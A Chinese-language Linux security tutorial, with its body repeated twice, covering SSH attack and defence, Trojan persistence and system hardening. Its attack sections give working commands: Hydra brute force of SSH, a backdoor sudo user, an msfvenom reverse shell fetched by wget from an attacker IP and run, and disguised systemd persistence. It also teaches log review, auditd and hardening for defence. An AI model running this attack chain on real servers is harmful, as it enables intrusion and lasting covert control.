一、课程导入为什么 Linux 是网安实战核心在网络安全领域Linux 是绝对的攻防主战场核心原因全球80% 以上服务器运行 Linux 系统攻击价值远高于个人电脑开源、轻量、稳定企业云服务器、网络设备、嵌入式设备均以 Linux 为主命令行高效可控是渗透测试、应急响应、安全加固的必备系统。可以说Windows 打基础Linux 定实战是网安从业者的核心技能。二、初识 Linux网安必备基础认知2.1 Linux 起源与发行版1991 年林纳斯・托瓦兹发布 Linux 内核全球开发者协作完善发行版 内核 配套软件主流分两大系列系列代表版本应用场景RedHat 系列CentOS、RHEL企业生产服务器Debian 系列Ubuntu、Kali桌面使用、网安实战2.2 Linux 服务器核心优势对比维度Windows 服务器Linux 服务器稳定性一般需定期重启极高可常年不关机安全性漏洞多、攻击面广权限严格、漏洞可控运维成本高低适用场景.NET 专属服务Web、数据库、云服务2.3 核心特点无盘符、纯命令行Linux没有 C/D/E 盘所有文件都在根目录/下操作完全依赖命令行这也是安全管控更严格的关键。三、系统服务安全SSH 服务攻防实战SSH 是 Linux远程管理核心协议默认端口 22类似 Windows 的 RDP也是黑客攻击 Linux 的第一靶点。3.1 SSH 基础与环境配置bash# 安装SSH服务 apt install openssh-server # 编辑配置文件 nano /etc/ssh/sshd_config # 重启服务 service ssh restart #关键配置项删除注释并修改 PermitRootLogin yes #允许root⽤户远程登录 PasswordAuthentication yes #允许密码认证 按ctrlx退出---按Y回⻋3.2 SSH 攻击实战暴力破解HydraHydra 是 Kali 自带的暴力破解工具批量尝试账号密码攻破 SSH 后直接掌控服务器。前提条件需准备密码本包含⼤量可能的密码组合bash# Hydra暴力破解SSH hydra -l root -P 密码字典.txt ssh://192.168.20.148真实安全案例SSH 弱口令导致服务器被挖矿某企业云服务器开启 22 端口管理员使用root/123456弱口令。黑客通过 Hydra1 分钟破解植入门罗币挖矿木马CPU 占用 100%服务器瘫痪业务中断 2 天损失超 5 万元。✅防护启示禁用 root 远程登录、设置 16 位以上强密码、开启 SSH 密钥登录。:::3.3 后门用户植入权限维持破解 SSH 后黑客会创建隐藏后门用户防止密码修改后失联bash# 创建后门用户 useradd -m backuser # 设置密码 passwd backuser # 赋予sudo权限 nano /etc/sudoers backuser ALL(ALL:ALL) ALL3.4 用户与权限管理Linux 权限是安全核心UID0 代表最高权限黑客会通过提权获取 rootbash# 查看UID0超级用户排查提权 awk -F: $30{print $1} /etc/passwd # 修改文件权限 chmod 755 文件名 chown 用户:用户组 文件名真实安全案例权限配置错误导致提权入侵某服务器管理员将/etc/sudoers权限设为 777普通用户直接修改文件获取 root 权限黑客入侵后删除所有业务数据。✅安全规范系统配置文件权限严格管控禁止随意赋予 777 权限。:::四、木马入侵检测Linux 长期控制技术木马是黑客控制 Linux 服务器的核心工具具备隐蔽性、自启性、持久性。4.1 木马制作MSFKali 的 MSF 框架可快速生成 Linux 木马bash# 生成Linux反向木马 msfvenom -p linux/x64/shell/reverse_tcp LHOST192.168.20.131 LPORT9999 -f elf -o shell.elf4.2 木马植入与启动攻击机开启 Apache 服务供目标下载木马目标通过wget下载木马添加执行权限启动bash# 下载木马 wget http://攻击IP/shell.elf # 添加执行权限 chmod x shell.elf # 启动木马 ./shell.elf4.3 三种权限维持方式黑客常用维持方式操作命令隐蔽性计划任务crontab -e中等开机启动项ls /etc/init.d/较高系统服务伪装systemd 配置文件极高bash# 木马伪装成系统服务最隐蔽 nano /etc/systemd/system/sys.service [Unit] Afternetwork.target [Service] ExecStart/shell.elf Restartalways [Install] WantedBymulti-user.target # 设置开机自启 systemctl enable sys.service真实安全案例木马伪装系统服务长期窃取数据某政务服务器被植入伪装成systemd-service的木马开机自动启动黑客持续窃取内部数据 3 个月最终通过日志排查发现木马服务。✅排查技巧定期检查陌生系统服务、开机自启项关闭无用服务。五、安全防护及加固Linux 防御实战5.1 日志排查服务器的 “监控录像”日志是入侵溯源、应急响应的核心Linux 核心日志日志类型路径查看命令系统日志/var/log/syslogcat、tail登录日志/var/log/auth.loggrep 筛选服务日志journalctl -u 服务名journalctlbash# 筛选SSH失败登录 journalctl -u ssh | grep Failed password # 筛选SSH成功登录 journalctl -u ssh | grep Accepted password5.2 高级审计auditd防日志删除黑客入侵后会删除日志掩盖痕迹auditd 是内核级审计工具无法被篡改bash# 安装auditd apt install auditd # 监控useradd命令防止创建后门用户 auditctl -w /usr/sbin/useradd -p x -k user_add # 查看审计记录 ausearch -k user_add5.3 Linux 系统加固核心必做5.3.1 账户加固挡住 80% 攻击bash# 禁止root远程登录最重要 nano /etc/ssh/sshd_config PermitRootLogin no # 重启SSH systemctl restart sshd # 删除陌生用户 userdel -r 陌生用户名5.3.2 防火墙加固服务器门卫bash# Ubuntu启用UFW防火墙 ufw enable # 允许22/80/443端口 ufw allow 22/tcp ufw allow 80/tcp # 拒绝所有未授权连接 ufw default deny incoming5.3.3 系统加固定期更新系统修复漏洞关闭无用端口与服务严格管控文件权限开启日志审计实时监控异常。六、Linux 高频网络安全问题及一站式解决方案结合企业真实运维场景整理10 类最常见的 Linux 网络安全问题包含风险原因、真实案例、一键解决方案直接落地使用。6.1 SSH 暴力破解 / 异常登录问题服务器 22 端口暴露被黑客批量爆破出现大量失败登录。解决方案禁止 root 远程登录修改 SSH 默认端口22→10022开启 SSH 密钥认证关闭密码认证配置 IP 白名单仅允许办公 IP 访问。bash# 修改SSH端口 Port 10022 # 关闭密码认证 PasswordAuthentication no6.2 弱口令 / 空口令账户问题服务器存在root/123456、test/test等弱口令极易被破解。:::warning 真实案例某测试服务器因空口令被黑客 10 秒入侵篡改首页。:::解决方案强制设置 16 位以上复杂密码开启密码策略定期更换密码删除空口令、无用账户。6.3 端口过度暴露22/3306/6379问题MySQL、Redis、SSH 端口直接对公网开放无任何防护。解决方案防火墙关闭非必要端口数据库仅允许内网访问禁止公网映射Redis 设置密码禁用危险命令。6.4 文件权限过大777 权限滥用问题网站目录、系统文件设为 777任意用户可修改易被上传木马。解决方案目录权限 755文件权限 644系统配置文件权限≤600禁止chmod -R 777操作。6.5 未知木马 / 挖矿程序驻留问题服务器 CPU 占满出现未知进程挖矿木马隐蔽运行。解决方案排查异常进程ps -ef | grep unknown查杀木马删除文件 关闭自启项断开外网连接清理计划任务、系统服务。6.6 计划任务 / 开机自启后门问题黑客添加定时任务周期性下载木马、执行恶意指令。解决方案查看定时任务crontab -l、cat /etc/crontab删除异常定时任务限制普通用户创建计划任务权限。6.7 未启用防火墙 / 防火墙关闭问题服务器防火墙关闭公网流量无过滤任意端口可访问。解决方案启用防火墙UFW/Firewalld默认拒绝所有入站仅放行业务端口配置防火墙开机自启。6.8 系统长期不更新高危漏洞未修复问题CentOS/Ubuntu 常年不更新存在脏牛、sudo 溢出等提权漏洞。解决方案定期更新apt update apt upgrade -y修复高危漏洞更新内核关闭无用服务减少攻击面。6.9 日志被清空 / 无法溯源问题黑客入侵后执行rm -rf /var/log删除日志无法追查攻击痕迹。解决方案安装 auditd 内核审计日志防删除日志远程备份防止本地删除监控日志文件完整性。6.10 SUID 权限提权漏洞问题系统文件被设置 SUID 权限普通用户可提权为 root。解决方案查找 SUID 文件find / -perm -4000 2/dev/null取消非必要文件的 SUID 权限限制普通用户执行高危命令。七、课程总结Linux 网安攻防核心逻辑Linux 网络安全的本质是攻防对抗攻击端找漏洞SSH 弱口令→ 入侵 → 植木马 / 留后门 → 长期控制防御端禁风险root 远程→ 强加固防火墙 / 权限→ 查日志溯源→ 清威胁。核心口诀禁 root、强密码、关端口查日志、杀木马、清后门勤更新、严权限、防提权。⚠️ 法律声明本文所有攻防技术仅用于授权渗透测试、服务器安全加固、学习研究。未经许可攻击他人服务器违反《网络安全法》《刑法》将依法追究法律责任文末互动Linux 网安实战先吃透 SSH 攻防与系统加固这是企业安全运维的核心觉得文章干货满满点赞 收藏 关注后续持续更新 Linux 渗透、应急响应、云安全实战教程
Linux 网络安全实战全攻略|SSH 攻防 + 木马检测 + 系统加固 附真实攻防案例
发布时间:2026/5/24 10:52:08
一、课程导入为什么 Linux 是网安实战核心在网络安全领域Linux 是绝对的攻防主战场核心原因全球80% 以上服务器运行 Linux 系统攻击价值远高于个人电脑开源、轻量、稳定企业云服务器、网络设备、嵌入式设备均以 Linux 为主命令行高效可控是渗透测试、应急响应、安全加固的必备系统。可以说Windows 打基础Linux 定实战是网安从业者的核心技能。二、初识 Linux网安必备基础认知2.1 Linux 起源与发行版1991 年林纳斯・托瓦兹发布 Linux 内核全球开发者协作完善发行版 内核 配套软件主流分两大系列系列代表版本应用场景RedHat 系列CentOS、RHEL企业生产服务器Debian 系列Ubuntu、Kali桌面使用、网安实战2.2 Linux 服务器核心优势对比维度Windows 服务器Linux 服务器稳定性一般需定期重启极高可常年不关机安全性漏洞多、攻击面广权限严格、漏洞可控运维成本高低适用场景.NET 专属服务Web、数据库、云服务2.3 核心特点无盘符、纯命令行Linux没有 C/D/E 盘所有文件都在根目录/下操作完全依赖命令行这也是安全管控更严格的关键。三、系统服务安全SSH 服务攻防实战SSH 是 Linux远程管理核心协议默认端口 22类似 Windows 的 RDP也是黑客攻击 Linux 的第一靶点。3.1 SSH 基础与环境配置bash# 安装SSH服务 apt install openssh-server # 编辑配置文件 nano /etc/ssh/sshd_config # 重启服务 service ssh restart #关键配置项删除注释并修改 PermitRootLogin yes #允许root⽤户远程登录 PasswordAuthentication yes #允许密码认证 按ctrlx退出---按Y回⻋3.2 SSH 攻击实战暴力破解HydraHydra 是 Kali 自带的暴力破解工具批量尝试账号密码攻破 SSH 后直接掌控服务器。前提条件需准备密码本包含⼤量可能的密码组合bash# Hydra暴力破解SSH hydra -l root -P 密码字典.txt ssh://192.168.20.148真实安全案例SSH 弱口令导致服务器被挖矿某企业云服务器开启 22 端口管理员使用root/123456弱口令。黑客通过 Hydra1 分钟破解植入门罗币挖矿木马CPU 占用 100%服务器瘫痪业务中断 2 天损失超 5 万元。✅防护启示禁用 root 远程登录、设置 16 位以上强密码、开启 SSH 密钥登录。:::3.3 后门用户植入权限维持破解 SSH 后黑客会创建隐藏后门用户防止密码修改后失联bash# 创建后门用户 useradd -m backuser # 设置密码 passwd backuser # 赋予sudo权限 nano /etc/sudoers backuser ALL(ALL:ALL) ALL3.4 用户与权限管理Linux 权限是安全核心UID0 代表最高权限黑客会通过提权获取 rootbash# 查看UID0超级用户排查提权 awk -F: $30{print $1} /etc/passwd # 修改文件权限 chmod 755 文件名 chown 用户:用户组 文件名真实安全案例权限配置错误导致提权入侵某服务器管理员将/etc/sudoers权限设为 777普通用户直接修改文件获取 root 权限黑客入侵后删除所有业务数据。✅安全规范系统配置文件权限严格管控禁止随意赋予 777 权限。:::四、木马入侵检测Linux 长期控制技术木马是黑客控制 Linux 服务器的核心工具具备隐蔽性、自启性、持久性。4.1 木马制作MSFKali 的 MSF 框架可快速生成 Linux 木马bash# 生成Linux反向木马 msfvenom -p linux/x64/shell/reverse_tcp LHOST192.168.20.131 LPORT9999 -f elf -o shell.elf4.2 木马植入与启动攻击机开启 Apache 服务供目标下载木马目标通过wget下载木马添加执行权限启动bash# 下载木马 wget http://攻击IP/shell.elf # 添加执行权限 chmod x shell.elf # 启动木马 ./shell.elf4.3 三种权限维持方式黑客常用维持方式操作命令隐蔽性计划任务crontab -e中等开机启动项ls /etc/init.d/较高系统服务伪装systemd 配置文件极高bash# 木马伪装成系统服务最隐蔽 nano /etc/systemd/system/sys.service [Unit] Afternetwork.target [Service] ExecStart/shell.elf Restartalways [Install] WantedBymulti-user.target # 设置开机自启 systemctl enable sys.service真实安全案例木马伪装系统服务长期窃取数据某政务服务器被植入伪装成systemd-service的木马开机自动启动黑客持续窃取内部数据 3 个月最终通过日志排查发现木马服务。✅排查技巧定期检查陌生系统服务、开机自启项关闭无用服务。五、安全防护及加固Linux 防御实战5.1 日志排查服务器的 “监控录像”日志是入侵溯源、应急响应的核心Linux 核心日志日志类型路径查看命令系统日志/var/log/syslogcat、tail登录日志/var/log/auth.loggrep 筛选服务日志journalctl -u 服务名journalctlbash# 筛选SSH失败登录 journalctl -u ssh | grep Failed password # 筛选SSH成功登录 journalctl -u ssh | grep Accepted password5.2 高级审计auditd防日志删除黑客入侵后会删除日志掩盖痕迹auditd 是内核级审计工具无法被篡改bash# 安装auditd apt install auditd # 监控useradd命令防止创建后门用户 auditctl -w /usr/sbin/useradd -p x -k user_add # 查看审计记录 ausearch -k user_add5.3 Linux 系统加固核心必做5.3.1 账户加固挡住 80% 攻击bash# 禁止root远程登录最重要 nano /etc/ssh/sshd_config PermitRootLogin no # 重启SSH systemctl restart sshd # 删除陌生用户 userdel -r 陌生用户名5.3.2 防火墙加固服务器门卫bash# Ubuntu启用UFW防火墙 ufw enable # 允许22/80/443端口 ufw allow 22/tcp ufw allow 80/tcp # 拒绝所有未授权连接 ufw default deny incoming5.3.3 系统加固定期更新系统修复漏洞关闭无用端口与服务严格管控文件权限开启日志审计实时监控异常。六、Linux 高频网络安全问题及一站式解决方案结合企业真实运维场景整理10 类最常见的 Linux 网络安全问题包含风险原因、真实案例、一键解决方案直接落地使用。6.1 SSH 暴力破解 / 异常登录问题服务器 22 端口暴露被黑客批量爆破出现大量失败登录。解决方案禁止 root 远程登录修改 SSH 默认端口22→10022开启 SSH 密钥认证关闭密码认证配置 IP 白名单仅允许办公 IP 访问。bash# 修改SSH端口 Port 10022 # 关闭密码认证 PasswordAuthentication no6.2 弱口令 / 空口令账户问题服务器存在root/123456、test/test等弱口令极易被破解。:::warning 真实案例某测试服务器因空口令被黑客 10 秒入侵篡改首页。:::解决方案强制设置 16 位以上复杂密码开启密码策略定期更换密码删除空口令、无用账户。6.3 端口过度暴露22/3306/6379问题MySQL、Redis、SSH 端口直接对公网开放无任何防护。解决方案防火墙关闭非必要端口数据库仅允许内网访问禁止公网映射Redis 设置密码禁用危险命令。6.4 文件权限过大777 权限滥用问题网站目录、系统文件设为 777任意用户可修改易被上传木马。解决方案目录权限 755文件权限 644系统配置文件权限≤600禁止chmod -R 777操作。6.5 未知木马 / 挖矿程序驻留问题服务器 CPU 占满出现未知进程挖矿木马隐蔽运行。解决方案排查异常进程ps -ef | grep unknown查杀木马删除文件 关闭自启项断开外网连接清理计划任务、系统服务。6.6 计划任务 / 开机自启后门问题黑客添加定时任务周期性下载木马、执行恶意指令。解决方案查看定时任务crontab -l、cat /etc/crontab删除异常定时任务限制普通用户创建计划任务权限。6.7 未启用防火墙 / 防火墙关闭问题服务器防火墙关闭公网流量无过滤任意端口可访问。解决方案启用防火墙UFW/Firewalld默认拒绝所有入站仅放行业务端口配置防火墙开机自启。6.8 系统长期不更新高危漏洞未修复问题CentOS/Ubuntu 常年不更新存在脏牛、sudo 溢出等提权漏洞。解决方案定期更新apt update apt upgrade -y修复高危漏洞更新内核关闭无用服务减少攻击面。6.9 日志被清空 / 无法溯源问题黑客入侵后执行rm -rf /var/log删除日志无法追查攻击痕迹。解决方案安装 auditd 内核审计日志防删除日志远程备份防止本地删除监控日志文件完整性。6.10 SUID 权限提权漏洞问题系统文件被设置 SUID 权限普通用户可提权为 root。解决方案查找 SUID 文件find / -perm -4000 2/dev/null取消非必要文件的 SUID 权限限制普通用户执行高危命令。七、课程总结Linux 网安攻防核心逻辑Linux 网络安全的本质是攻防对抗攻击端找漏洞SSH 弱口令→ 入侵 → 植木马 / 留后门 → 长期控制防御端禁风险root 远程→ 强加固防火墙 / 权限→ 查日志溯源→ 清威胁。核心口诀禁 root、强密码、关端口查日志、杀木马、清后门勤更新、严权限、防提权。⚠️ 法律声明本文所有攻防技术仅用于授权渗透测试、服务器安全加固、学习研究。未经许可攻击他人服务器违反《网络安全法》《刑法》将依法追究法律责任文末互动Linux 网安实战先吃透 SSH 攻防与系统加固这是企业安全运维的核心觉得文章干货满满点赞 收藏 关注后续持续更新 Linux 渗透、应急响应、云安全实战教程
,从入门到精通,收藏这一篇就够了!)
)
:测试如何提前在代码提交阶段发现 Bug?)
)
